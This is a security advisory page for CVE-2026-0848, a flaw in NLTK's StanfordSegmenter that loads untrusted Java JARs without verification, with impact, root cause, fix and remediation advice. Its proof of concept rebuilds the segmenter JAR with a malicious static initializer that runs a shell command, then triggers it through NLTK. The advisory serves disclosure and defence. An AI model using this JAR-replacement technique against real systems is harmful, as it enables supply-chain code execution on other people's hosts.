📄 NLTK StanfordSegmenter 3.9.2 Arbitrary Code Execution

🗓️ 31 Mar 2026 00:00:00Reported by Sarvesh PatilType

packetstorm🔗 packetstorm.news👁 177 Views

NLTK StanfordSegmenter loads external Java jars without verification, enabling supply-chain remote code execution.

Reporter	Title	Published	Views	Family All 35
Huntr	Arbitrary Code Execution in NLTK StanfordSegmenter via untrusted JAR loading	5 Dec 202520:47	–	huntr
Huntr	Incomplete Fix for CVE-2026-0848: 5 Stanford Interface Classes Still Vulnerable to Untrusted JAR Code Execution	5 Apr 202600:58	–	huntr
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities in NLTK bundled with IBM Fusion, IBM Fusion HCI, and IBM Fusion Content-Aware Storage	17 Jun 202613:55	–	ibm
IBM Security Bulletins	Security Bulletin: Maximo AI Service uses multiple third party dependencies which is vulnerable to multiple CVEs.	27 Apr 202607:43	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to arbitrary code execution in NLTK [CVE-2026-0848]	14 Apr 202615:18	–	ibm
GithubExploit	Exploit for CVE-2026-0848	31 Mar 202614:34	–	githubexploit
ATTACKERKB	CVE-2026-0848	5 Mar 202620:48	–	attackerkb
BDU FSTEC	The vulnerability of the StanfordSegmenter module in the Natural Language Processing and statistics library package allows a hacker to execute arbitrary code.	9 Jun 202600:00	–	bdu_fstec
Circl	CVE-2026-0848	5 Mar 202622:06	–	circl
CNNVD	NLTK 输入验证错误漏洞	5 Mar 202600:00	–	cnnvd

# CVE-2026-0848 — NLTK StanfordSegmenter: Arbitrary Code Execution via Untrusted JAR Loading
    
    <p align="center">
      <img src="https://img.shields.io/badge/CVE-2026--0848-critical?style=for-the-badge&color=8B0000" />
      <img src="https://img.shields.io/badge/Severity-Critical%20(CVSS%2010.0)-red?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Affected-NLTK%20%3C%3D%203.9.2-yellow?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Type-CWE--20%20Improper%20Input%20Validation-blue?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Fix-Merged%20(PR%20%233522)-brightgreen?style=for-the-badge" />
    </p>
    
    ---
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | CVE-2026-0848 |
    | **Package** | `nltk` (Natural Language Toolkit) |
    | **Registry** | PyPI |
    | **Affected Versions** | `<= 3.9.2` |
    | **Vulnerability Type** | CWE-20: Improper Input Validation |
    | **CVSS Score** | 10.0 (Critical) |
    | **Attack Vector** | Network |
    | **Attack Complexity** | Low |
    | **Privileges Required** | None |
    | **User Interaction** | None |
    | **Scope** | Changed |
    | **Confidentiality Impact** | High |
    | **Integrity Impact** | High |
    | **Availability Impact** | High |
    | **Reported On** | December 6, 2025 |
    | **CVE Published** | March 2026 |
    | **Supported By** | Palo Alto Networks / Prisma AIRS |
    
    ---
    
    ## Description
    
    `nltk.tokenize.StanfordSegmenter` dynamically loads external Java `.jar` files via `subprocess` without performing any integrity verification, signature checking, or sandboxing. The class accepts fully attacker-controlled parameters including `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class`, and passes them directly to a `java -cp` invocation.
    
    If an attacker can supply or replace the JAR file — through a poisoned model download, a man-in-the-middle package swap, dependency poisoning, or a corrupted release mirror — arbitrary Java bytecode executes at class-load time via the JVM's static initializer mechanism. This constitutes a **supply-chain Remote Code Execution** vulnerability and fully escapes the Python runtime.
    
    ---
    
    ## Affected Components
    
    | File | Lines | Description |
    |---|---|---|
    | `nltk/tokenize/stanford_segmenter.py` | L53–L118 | Accepts attacker-controlled `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` with no validation |
    | `nltk/internals.py` | L220–L300 | Launches Java execution directly with user-controlled JAR path and classpath, no sandboxing or checksum verification |
    | `nltk/internals.py` | L109–L152 | `subprocess.Popen()` executes Java with unvalidated classpath input, allowing the JVM to load arbitrary bytecode and run static initializers |
    
    ---
    
    ## CVSS Vector
    
    ```
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    ```
    
    | Metric | Value |
    |---|---|
    | Attack Vector | Network |
    | Attack Complexity | Low |
    | Privileges Required | None |
    | User Interaction | None |
    | Scope | Changed |
    | Confidentiality | High |
    | Integrity | High |
    | Availability | High |
    
    ---
    
    ## Impact
    
    Successful exploitation grants an attacker **full control over the system** running the NLTK segmentation process:
    
    - **Arbitrary Java code execution** — Any bytecode embedded in the malicious JAR runs with the privileges of the Python/Java process
    - **Python runtime escape** — Execution moves into the JVM, bypassing Python-level sandboxing entirely
    - **OS-level command execution** — Attackers can invoke `Runtime.getRuntime().exec()` or `ProcessBuilder` to run arbitrary shell commands
    - **Data theft and modification** — Access to all files, environment variables, API keys, and secrets readable by the process
    - **Full environment compromise** — In CI/CD, production NLP pipelines, or server environments, a single malicious JAR leads to complete host takeover
    
    ### High-Risk Deployment Scenarios
    
    | Scenario | Impact |
    |---|---|
    | ML researcher loads a pretrained segmenter from the internet | Remote attacker gains code execution |
    | Organization downloads a corrupted Chinese segmentation model ZIP | Malware executes inside production NLP pipeline |
    | CI/CD server installs model via `wget`/`unzip` from a non-HTTPS mirror | Full environment compromise |
    | Dependency takeover or poisoned release mirror | Complete supply-chain RCE |
    
    This vulnerability affects any NLP workflow using `StanfordSegmenter`, including chatbots, LLM preprocessing pipelines, dataset segmentation, document classification, and production inference services.
    
    ---
    
    ## Proof of Concept
    
    > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**
    
    ### Step 1 — Replace Core Classifier with Malicious Java Class
    
    ```bash
    cd stanford-segmenter-2020-11-17/merged
    jar xf ../stanford-segmenter-4.2.0.jar
    rm -rf edu/stanford/nlp/ie/crf/CRFClassifier.class
    
    cat << 'EOF' > edu/stanford/nlp/ie/crf/CRFClassifier.java
    package edu.stanford.nlp.ie.crf;
    
    public class CRFClassifier {
        static {
            try {
                System.out.println("\nPayload executed — Code ran on class load!\n");
                Runtime.getRuntime().exec("touch /tmp/pwned_hijack");
            } catch(Exception e){}
        }
        public static void main(String[] args){}
    }
    EOF
    
    javac edu/stanford/nlp/ie/crf/CRFClassifier.java
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    cp exploit.jar ../stanford-segmenter.jar
    ```
    
    ### Step 2 — Build the Malicious JAR
    
    ```bash
    mkdir merged && cd merged
    javac Payload.java
    jar xf ../stanford-segmenter-4.2.0.jar
    jar xf ../stanford-corenlp-4.2.0/stanford-corenlp-4.2.0.jar
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    jar uf exploit.jar Payload.class
    cp exploit.jar ../stanford-segmenter.jar
    cd ..
    ```
    
    ### Step 3 — Trigger via NLTK
    
    ```python
    # test.py
    from nltk.tokenize.stanford_segmenter import StanfordSegmenter
    
    print("[+] Triggering payload via modified Stanford JAR...")
    
    seg = StanfordSegmenter(
        path_to_jar="stanford-segmenter.jar",
        path_to_sihan_corpora_dict="./data/",
        path_to_dict="./data/dict-chris6.ser.gz",
        path_to_model="./data/pku.gz",
        java_class="edu.stanford.nlp.ie.crf.CRFClassifier",
        encoding="utf-8"
    )
    
    print("[+] Running segmentation...")
    print(seg.segment("我爱自然语言处理"))
    ```
    
    **Output:**
    
    ```
    [+] Triggering payload via modified Stanford JAR...
    
    Payload executed — Code ran on class load!
    
    [+] Running segmentation...
    我 爱 自然语言 处理
    ```
    
    **Confirm RCE:**
    
    ```bash
    ls /tmp | grep pwned_hijack
    # pwned_hijack
    ```
    
    ---
    
    ## Root Cause
    
    The vulnerability exists across two files:
    
    **`stanford_segmenter.py`** — The `StanfordSegmenter` class constructor accepts `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` as plain string arguments and forwards them directly to the Java execution layer without performing any of the following:
    
    - Path allowlist or trusted-directory enforcement
    - SHA-256 or cryptographic signature verification of the JAR
    - Validation of the `java_class` parameter against a known-safe set of class names
    
    **`internals.py`** — The `java()` helper constructs and launches a `subprocess.Popen()` call with the user-supplied classpath. The JVM immediately loads all classes in the provided JAR, executing any static initializer blocks before the application logic runs. There is no sandbox, no integrity gate, and no mechanism to prevent execution of injected bytecode.
    
    ---
    
    ## Fix
    
    The vulnerability has been fully resolved in the upstream NLTK repository.
    
    | Resource | Link |
    |---|---|
    | **Central Security Fix (all CVEs)** | [https://github.com/nltk/nltk/pull/3522](https://github.com/nltk/nltk/pull/3522) |
    | Researcher's initial fix PR | https://github.com/nltk/nltk/pull/3477 (merged) |
    
    Upgrade to a patched version of NLTK as soon as it is available on PyPI.
    
    ---
    
    ## Remediation
    
    | Action | Details |
    |---|---|
    | **Upgrade NLTK** | Update to a version greater than 3.9.2 containing the fix from PR #3522 |
    | **Do Not Use User-Controlled JAR Paths** | Never allow user input to influence `path_to_jar`, `path_to_model`, or `java_class` arguments |
    | **Verify JAR Integrity** | Always verify SHA-256 checksums of downloaded JAR files against official published hashes before use |
    | **Use HTTPS Sources Only** | Download model files and JARs exclusively from official HTTPS sources; reject any HTTP or unverified mirror |
    | **Least Privilege** | Run NLTK-based services under a restricted OS user with minimal filesystem and network permissions |
    | **Containerization** | Isolate NLP services in Docker containers or similar sandboxes to limit the blast radius of JAR-based exploits |
    | **Dependency Monitoring** | Use a software composition analysis tool to detect tampered or replaced JAR dependencies in CI/CD pipelines |
    
    **Upgrade via pip:**
    
    ```bash
    pip install --upgrade nltk
    ```
    
    **Verify installed version:**
    
    ```bash
    python -c "import nltk; print(nltk.__version__)"
    ```
    
    ---
    
    ## Timeline
    
    | Date | Event |
    |---|---|
    | December 6, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 (Sarvesh Patil) |
    | December 2025 | NLTK maintainer team notified via huntr.dev |
    | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded |
    | January 2026 | CVE-2026-0848 assigned |
    | January 2026 | Researcher's fix PR #3477 submitted and merged |
    | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
    | March 2026 | CVE published on NVD and huntr.dev |
    | March 2026 | Central security fix for all CVEs merged via PR #3522 |
    
    ---
    
    ## References
    
    | Resource | Link |
    |---|---|
    | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0848 |
    | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0848 |
    | huntr.dev Report | https://huntr.dev |
    | Central Fix PR | https://github.com/nltk/nltk/pull/3522 |
    | Researcher Fix PR | https://github.com/nltk/nltk/pull/3477 |
    | NLTK on PyPI | https://pypi.org/project/nltk/ |
    | Stanford Word Segmenter | https://nlp.stanford.edu/software/segmenter.html |
    | OWASP — Arbitrary Code Execution | https://owasp.org/www-community/attacks/Code_Injection |
    | OWASP — Untrusted Search Path | https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection |
    | CWE-20: Improper Input Validation | https://cwe.mitre.org/data/definitions/20.html |
    | CWE-502: Deserialization of Untrusted Data | https://cwe.mitre.org/data/definitions/502.html |
    
    ---
    
    ## Disclaimer
    
    This repository documents CVE-2026-0848 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability.
    
    Any use of this information to access or compromise systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.
    
    Contributors: [ketanHub](https://github.com/ketanHub)

31 Mar 2026 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 310

EPSS0.00809

SSVC